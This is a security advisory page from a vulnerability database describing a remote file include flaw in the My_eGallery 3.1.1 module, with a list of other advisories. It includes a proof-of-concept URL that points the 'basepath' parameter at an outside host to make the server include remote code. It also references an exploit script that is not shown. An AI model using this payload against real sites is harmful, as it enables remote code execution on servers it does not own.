exploits , vulnerabilities , articles , My_EGallery Module Remote Include Command Injection Vulnerability

Title	My_EGallery Module Remote Include Command Injection Vulnerability
Published	2003-11-26-12:00AM
Updated	2004-11-19-05:15PM
Class	Input Validation Error
CVE	CVE-MAP-NOMATCH
Remote	Yes
Local	No
Credit	Discovery credited to Bojan Zdrnja.
Vulnerable	lottasophie My_eGallery 3.1.1 f lottasophie My_eGallery 3.1.1
Not Vulnerable	lottasophie My_eGallery 3.1.1 g
Code	The following proof of concept has been provided: http://www.example.com/modules/My_eGallery/public/displayCategory.php?basepath=http://www.example.com The following exploit has been made available: /data/vulnerabilities/exploits/My_eGalleryExploit.pl
TXT

Vulnerabilities - newest 10 RSS | More

• 2009-12-14 Microsoft Protected Extensible Authentication Protocol Authentication Bypass Vulnerability
• 2009-12-14 Google Chrome DNS Pre-Fetching Proxy Cache Information Disclosure Vulnerability
• 2009-12-14 Oracle E-Business Suite Multiple Remote Vulnerabilities
• 2009-12-14 MySQL Multiple Remote Denial Of Service Vulnerabilities
• 2009-12-14 Digital Scribe Multiple SQL Injection Vulnerabilities
• 2009-12-14 Microsoft WordPad and Office Text Converters Word 97 File Parsing Memory Corruption Vulnerability
• 2009-12-14 Microsoft Protected Extensible Authentication Protocol Memory Corruption Vulnerability
• 2009-12-14 WebKit Web Inspector Cross Site Scripting Vulnerability
• 2009-12-11 Symantec Veritas VRTSweb Incoming Data Remote Code Execution Vulnerability
• 2009-12-11 HP OpenView Network Node Manager Perl CGI Executables Remote Code Execution Vulnerability

• Vulnerabilities
• Exploits
• News
• Articles

Copyright 2007, SecurityDot
Tue, 15 Dec 2009 06:08:09 +0000